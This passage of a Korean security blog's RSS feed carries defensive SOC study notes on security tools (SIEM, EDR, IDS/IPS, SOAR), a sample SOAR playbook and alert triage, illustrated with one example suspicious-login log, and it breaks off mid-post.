data-og-image=&quot;https://scrap.kakaocdn.net/dn/xFjKm/dJMb8YXNzbT/jWQH5paYNjkk1KbFK7nUT1/img.png?width=800&amp;amp;height=800&amp;amp;face=0_0_800_800,https://scrap.kakaocdn.net/dn/dtXOCT/dJMb8Qeoctf/gH7eDkoroKckn5Bv5Fu4nk/img.png?width=800&amp;amp;height=800&amp;amp;face=0_0_800_800,https://scrap.kakaocdn.net/dn/db7bDc/dJMb8XkhoO3/b6FsXcRL8kdu2XUpEDc3Lk/img.png?width=686&amp;amp;height=840&amp;amp;face=0_0_686_840&quot;&gt;&lt;a href=&quot;https://anbymata.tistory.com/68&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot; data-source-url=&quot;https://anbymata.tistory.com/68&quot;&gt;
&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/xFjKm/dJMb8YXNzbT/jWQH5paYNjkk1KbFK7nUT1/img.png?width=800&amp;amp;height=800&amp;amp;face=0_0_800_800,https://scrap.kakaocdn.net/dn/dtXOCT/dJMb8Qeoctf/gH7eDkoroKckn5Bv5Fu4nk/img.png?width=800&amp;amp;height=800&amp;amp;face=0_0_800_800,https://scrap.kakaocdn.net/dn/db7bDc/dJMb8XkhoO3/b6FsXcRL8kdu2XUpEDc3Lk/img.png?width=686&amp;amp;height=840&amp;amp;face=0_0_686_840');&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;og-text&quot;&gt;
&lt;p class=&quot;og-title&quot; data-ke-size=&quot;size16&quot;&gt;[Blue Team] EP.6 - Linux 로그 기초&lt;/p&gt;
&lt;p class=&quot;og-desc&quot; data-ke-size=&quot;size16&quot;&gt;[6-1] Linux의 주요 관찰 행위 유형Auth &amp;amp; System (인증 및 권한)- 사용자 로그인/로그아웃 - SSH 접속이나 Console을 통한 접근 기록 확인- 권한 상승 - sudo나 su 명령을 통해 일반 사용자의 관리자 권한 획득&lt;/p&gt;
&lt;p class=&quot;og-host&quot; data-ke-size=&quot;size16&quot;&gt;anbymata.tistory.com&lt;/p&gt;
&lt;/div&gt;
&lt;/a&gt;&lt;/figure&gt;</description>
      <category>Blue Team (SOC)/SOC 기초 개념</category>
      <category>Blue Team</category>
      <category>cert</category>
      <category>Cyber Security</category>
      <category>IR</category>
      <category>SoC</category>
      <category>보안 관제</category>
      <category>블루팀</category>
      <category>정보보안</category>
      <category>정보보호</category>
      <category>해킹 스터디</category>
      <author>AnbyMata</author>
      <guid isPermaLink="true">https://anbymata.tistory.com/67</guid>
      <comments>https://anbymata.tistory.com/67#entry67comment</comments>
      <pubDate>Sat, 18 Apr 2026 22:00:14 +0900</pubDate>
    </item>
    <item>
      <title>[Blue Team] EP.4 - 보안 도구들</title>
      <link>https://anbymata.tistory.com/66</link>
      <description>&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;b&gt;[4-1] SOC의 주요 보안 도구들&lt;/b&gt;&lt;/h3&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;SIEM&lt;/b&gt; (Security Information and Event Management)&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- 중앙 관제 플랫폼&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- 인프라 전체의 로그 수집&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- 로그들을 정구화하고 상관관계를 분석하여 위협 탐지&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- &lt;span style=&quot;color: #006dd7;&quot;&gt;범위&lt;/span&gt;: 전체 인프라를 넓게 조망&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&amp;nbsp;&lt;b&gt;EDR&lt;/b&gt; (Endpoint Detection and Response)&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- 개별 PC나 서버(endpoint) 내부에서 일어나는 프로세스 실행, 파일 생성 등 상세 확인&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- 위협시 격리 및 파일 차단 조치 수행&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- &lt;span style=&quot;color: #006dd7;&quot;&gt;범위&lt;/span&gt;: 호스트 내부를 깊게 분석&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;IDS/IPS&lt;/b&gt; (Intrusion Detection/Prevention System)&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- &lt;b&gt;IDS&lt;/b&gt; = 네트워크 트래픽 흐름 속에서 악성 패턴이나 비정상 통신 탐지&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- &lt;b&gt;IPS&lt;/b&gt; = 악성 패턴이나 비정상 통신 탐지 시 정책에 따라 차단&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- &lt;span style=&quot;color: #006dd7;&quot;&gt;범위&lt;/span&gt;: 네트워크 흐름 전체를 감시&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;SOAR&lt;/b&gt; (Security Orchestration, Automation and Response)&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- 여러 보안 도구와 시스템을 연결&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- 반복적인 업무를 Playbook 기반으로 자동화&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- 대응 속도를 극대화하는 엔진&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- &lt;span style=&quot;color: #006dd7;&quot;&gt;범위&lt;/span&gt;: 각 보안 도구 간의 연결&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;Case/Ticket&lt;/b&gt; (수사 기록 장부)&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- 탐지된 위협의 분석 과정부터 최종 조치 결과까지의 모든 과정 문서화&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- 팀 간의 협업 및 추적 관리&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- &lt;span style=&quot;color: #006dd7;&quot;&gt;범위&lt;/span&gt;: 전체적인 보안의 운영 문서화&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 style=&quot;color: #000000; text-align: start;&quot; data-ke-size=&quot;size23&quot;&gt;&lt;b&gt;[4-2] 현대 SOC의 Operational Chain&lt;/b&gt;&lt;/h3&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;1. Data Sources&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;= 로그, 트래픽, 엔드포인트 등 모든 보안 데이터의 시작점&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;2. SIEM Detection&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;= 수집된 데이터를 바탕으로 SIEM이 위협을 탐지&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;3. Analyst Triage&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;= 분석가가 탐지된 이벤트의 우선순위를 정하고 실제 위협인지 판단&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;4. EDR/Net Deep Dive&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;= 필요 시 엔드포인트나 네트워크 데이터를 통해 심층 분석&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;5. SOAR/IR Action&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;= SOAR 및 IR 체계를 통해 위협을 차단하고 격리&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;6. Case Closure&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;= 모든 대응 완료 &amp;rarr; 사건 종결&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;운영의 효율화 &amp;rarr; &lt;b&gt;MTTD&lt;/b&gt;와 &lt;b&gt;MTTR&lt;/b&gt;의 효과적 감소&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;b&gt;[4-3] SOAR Playbook 예시&lt;/b&gt;&lt;/h3&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;1. Trigger&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- 로그인 페이지 SQL Inection 시도 탐지 &amp;rarr; WAF 또는 SIEM Alert 발생&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;2. 자동 Enrichment&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- 공격 IP 평판 조회&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- payload 분석&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- 과거 공격 이력 대조&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;3. 조건 분기&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- 명백한 악성 공격 &amp;rarr; 4번 자동 조치&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- 공격 여부 모호 &amp;rarr; 보안 분석가에게 판단 요청&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;4. 자동 조치&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- WAF 에서 해당 IP 즉각 차단&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- 침해 시도한 계정 임시 잠금&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- 보안 장비 정책 업데이트&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;5. 자동 기록&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- Incident Case 생성&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- 차단 로그 기록&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- 공격 패턴을 침해 지표 (IOC)로 등록 및 보고서 작성&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;[Blue Team] EP.4 - 보안 도구들. &lt;span style=&quot;color: #ee2323;&quot;&gt;END.&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;background-color: #ffffff; color: #222222; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;[Blue Team] EP.5 - 공격 시나리오. Continue...&lt;/b&gt;&lt;/p&gt;
&lt;p style=&quot;background-color: #ffffff; color: #222222; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&lt;a href=&quot;https://anbymata.tistory.com/67&quot; target=&quot;_blank&quot; rel=&quot;noopener&amp;nbsp;noreferrer&quot;&gt;https://anbymata.tistory.com/67&lt;/a&gt;&lt;/b&gt;&lt;/p&gt;
&lt;figure id=&quot;og_1776668958118&quot; contenteditable=&quot;false&quot; data-ke-type=&quot;opengraph&quot; data-ke-align=&quot;alignCenter&quot; data-og-type=&quot;article&quot; data-og-title=&quot;[Blue Team] EP.5 - 공격 시나리오&quot; data-og-description=&quot;[5-1] Cyber Kill Chain (사이버 공격의 흐름)1. 초기 침투 (Initial Access) - 피싱 메일 = 악성 메일 유포 및 유입 - 흔적: 악성 URL 클릭, 첨부파일 실행 &amp;rarr; Email Gateway: 헤더 분석을 통한 발신자 평판 이상 및 &quot; data-og-host=&quot;anbymata.tistory.com&quot; data-og-source-url=&quot;https://anbymata.tistory.com/67&quot; data-og-url=&quot;https://anbymata.tistory.com/67&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/NBLLq/dJMb9frHukj/lLYzgfiSUA86CtCoZURElk/img.png?width=800&amp;amp;height=800&amp;amp;face=0_0_800_800,https://scrap.kakaocdn.net/dn/bZGnAV/dJMb9dHqbOP/73gIiySoqBQOFHuWZiBQ70/img.png?width=800&amp;amp;height=800&amp;amp;face=0_0_800_800,https://scrap.kakaocdn.net/dn/b7Dk6l/dJMb9jOoX7N/CvFBFBIjDTIKIZXpiEWwj0/img.png?width=686&amp;amp;height=840&amp;amp;face=0_0_686_840&quot;&gt;&lt;a href=&quot;https://anbymata.tistory.com/67&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot; data-source-url=&quot;https://anbymata.tistory.com/67&quot;&gt;
&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/NBLLq/dJMb9frHukj/lLYzgfiSUA86CtCoZURElk/img.png?width=800&amp;amp;height=800&amp;amp;face=0_0_800_800,https://scrap.kakaocdn.net/dn/bZGnAV/dJMb9dHqbOP/73gIiySoqBQOFHuWZiBQ70/img.png?width=800&amp;amp;height=800&amp;amp;face=0_0_800_800,https://scrap.kakaocdn.net/dn/b7Dk6l/dJMb9jOoX7N/CvFBFBIjDTIKIZXpiEWwj0/img.png?width=686&amp;amp;height=840&amp;amp;face=0_0_686_840');&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;og-text&quot;&gt;
&lt;p class=&quot;og-title&quot; data-ke-size=&quot;size16&quot;&gt;[Blue Team] EP.5 - 공격 시나리오&lt;/p&gt;
&lt;p class=&quot;og-desc&quot; data-ke-size=&quot;size16&quot;&gt;[5-1] Cyber Kill Chain (사이버 공격의 흐름)1. 초기 침투 (Initial Access) - 피싱 메일 = 악성 메일 유포 및 유입 - 흔적: 악성 URL 클릭, 첨부파일 실행 &amp;rarr; Email Gateway: 헤더 분석을 통한 발신자 평판 이상 및&lt;/p&gt;
&lt;p class=&quot;og-host&quot; data-ke-size=&quot;size16&quot;&gt;anbymata.tistory.com&lt;/p&gt;
&lt;/div&gt;
&lt;/a&gt;&lt;/figure&gt;</description>
      <category>Blue Team (SOC)/SOC 기초 개념</category>
      <category>Blue Team</category>
      <category>cert</category>
      <category>Cyber Security</category>
      <category>IR</category>
      <category>SoC</category>
      <category>보안 관제</category>
      <category>블루팀</category>
      <category>정보보안</category>
      <category>정보보호</category>
      <category>해킹 스터디</category>
      <author>AnbyMata</author>
      <guid isPermaLink="true">https://anbymata.tistory.com/66</guid>
      <comments>https://anbymata.tistory.com/66#entry66comment</comments>
      <pubDate>Fri, 17 Apr 2026 22:00:14 +0900</pubDate>
    </item>
    <item>
      <title>[Blue Team] EP.3 - Alert 판단</title>
      <link>https://anbymata.tistory.com/65</link>
      <description>&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;b&gt;[3-1] Log, Event, Alert, Incident&lt;/b&gt;&lt;/h3&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;1단계 - &lt;b&gt;Log &lt;span style=&quot;color: #9d9d9d;&quot;&gt;(로그)&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- 시스템이 남긴 원시 기록 (의미 없는 사실)&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- &lt;span style=&quot;color: #006dd7;&quot;&gt;ex)&lt;/span&gt; 11:10에 검정색 후드를 입은 남성이 건물에 출입함&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;2단계 - &lt;b&gt;Event &lt;span style=&quot;color: #9d9d9d;&quot;&gt;(이벤트)&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- 의미를 해석한 단위 행위 (의미 부여)&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- &lt;span style=&quot;color: #006dd7;&quot;&gt;ex)&lt;/span&gt; 방금 출입한 남성이 서버실이 있는 위치로 이동함&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;3단계 -&lt;b&gt; Alert &lt;span style=&quot;color: #9d9d9d;&quot;&gt;(알림)&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- 탐지 로직이 주의를 요구한 상태 (가설)&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- &lt;span style=&quot;color: #006dd7;&quot;&gt;ex)&lt;/span&gt; 해당 남성은 사원증이 없는 상태로 서버실로 접근 중 &amp;rarr; 확인 필요&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;4단계 - &lt;b&gt;Incident &lt;span style=&quot;color: #9d9d9d;&quot;&gt;(사건)&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- 실제 대응이 필요한 보안 사고 (결론)&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;-&lt;span style=&quot;color: #006dd7;&quot;&gt; ex)&lt;/span&gt; 사원이 아닌 외부인이 서버실에 무단 침입 &amp;rarr; 경비 출동 및 경찰 신고&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;b&gt;[3-2] 로그의 핵심 필드&lt;/b&gt;&lt;/h3&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignLeft&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;812&quot; data-origin-height=&quot;90&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bhK25Y/dJMcabjA8Y0/6QrFaI2PyAknkZmuWeBbd1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bhK25Y/dJMcabjA8Y0/6QrFaI2PyAknkZmuWeBbd1/img.png&quot; data-alt=&quot;로그 예시&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bhK25Y/dJMcabjA8Y0/6QrFaI2PyAknkZmuWeBbd1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbhK25Y%2FdJMcabjA8Y0%2F6QrFaI2PyAknkZmuWeBbd1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;812&quot; height=&quot;90&quot; data-origin-width=&quot;812&quot; data-origin-height=&quot;90&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;로그 예시&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;span style=&quot;color: #006dd7;&quot;&gt;&lt;b&gt;When (시간)&lt;/b&gt;&lt;/span&gt; - &lt;b&gt;언제&lt;/b&gt; 발생했는가?&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- [2026-04-16T14:40:19Z]&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;rarr; 2026년 04월 16일 오후 2시 40분&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;span style=&quot;color: #f89009;&quot;&gt;&lt;b&gt;Who (사용자) &lt;/b&gt;&lt;/span&gt;- &lt;b&gt;누가&lt;/b&gt; 행동했는가?&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- user=game_dev02&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;rarr; 게임 개발자&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #8a3db6;&quot;&gt;What (행위)&lt;/span&gt;&lt;/b&gt; - &lt;b&gt;무엇&lt;/b&gt;을 했는가?&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- action=login&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;rarr; 로그인 시도&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #ee2323;&quot;&gt;Where (출발지)&lt;/span&gt;&lt;/b&gt; - &lt;b&gt;어디&lt;/b&gt;서 왔는가?&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- src_ip=222.128.110.77&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;rarr; 중국의 ip (src_country=CN 부분을 통해 직관적 확인 가능)&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #009a87;&quot;&gt;Result (결과)&lt;/span&gt;&lt;/b&gt; - &lt;b&gt;성공&lt;/b&gt;했는가?&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- result=success&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;rarr; 로그인 성공&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;기타 정보&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- device=Linux_Ubuntu_Unknown&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;rarr; 일반적인 Windows나 Mac이 아닌 미확인 기기&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- mfa=passed&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;rarr; 2차 인증도 통과&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 style=&quot;color: #000000; text-align: start;&quot; data-ke-size=&quot;size23&quot;&gt;&lt;b&gt;[3-3] Alert Triage &lt;span style=&quot;color: #9d9d9d;&quot;&gt;(분류 과정)&lt;/span&gt;&lt;/b&gt;&lt;/h3&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;1. 데이터 신뢰성 &lt;/b&gt;- 신뢰할 수 있는 데이터인가?&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- 시스템 오류나 중복 데이터 &amp;rarr; &lt;b&gt;닫기 / 병합&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;2. 정상 여부 &lt;/b&gt;- 미리 알려진 정상 행위인가?&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- 승인된 작업이나 정시 점검 &amp;rarr; &lt;b&gt;Bengin / 예외 처리&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;3. 자산 중요도&lt;/b&gt; - 핵심 자산/계정에 영향이 있는가?&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- 관리자 계정이나 핵심 서버에 영향 &amp;rarr;&lt;b&gt; L2 escalation&lt;/b&gt;&lt;span style=&quot;color: #9d9d9d;&quot;&gt;(연결)&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;4. 즉시 조치 필요성&lt;/b&gt; - 지금 당장 대처해야될 사항인가?&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- 영향이 확산되고 파괴적임 &amp;rarr; &lt;b&gt;IR/CERT 호출&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 style=&quot;color: #000000; text-align: start;&quot; data-ke-size=&quot;size23&quot;&gt;&lt;b&gt;[3-4] 판단문 작성의 4대 요소&lt;/b&gt;&lt;/h3&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;1. Fact (관측 사실)&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- 데이터에 나타난 객관적 사실&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- &lt;span style=&quot;color: #006dd7;&quot;&gt;ex)&lt;/span&gt; 2026년 4월 16일 14:40(KST), 게임 개발자 계정(game_dev02)이 중국(CN) IP 대역에서 로그인에 성공&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;2. Reason (의심 근거)&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- 위협이라고 생각한 이유&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- &lt;span style=&quot;color: #006dd7;&quot;&gt;ex)&lt;/span&gt; 해당 개발자는 현재 사내(국내) 근무 중으로, 중국 출장이나 외부 접속 승인 내역이 없음&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- &lt;span style=&quot;color: #006dd7;&quot;&gt;ex)&lt;/span&gt; 사내 표준 단말 (Windows/Mac)이 아닌 생소한 기기 사용&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;3. Impact (영향 범위)&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- 피해 규모와 민감도 파악&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- &lt;span style=&quot;color: #006dd7;&quot;&gt;ex)&lt;/span&gt; game_dev02 계정은 핵심 게임 소스 코드에 대한 쓰기 권한을 보유함&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- &lt;span style=&quot;color: #006dd7;&quot;&gt;ex)&lt;/span&gt; 게임의 핵심 기술 유출 가능성이나 악성 코드 삽입 가능성 존재&lt;b&gt;&lt;/b&gt;&lt;/p&gt;
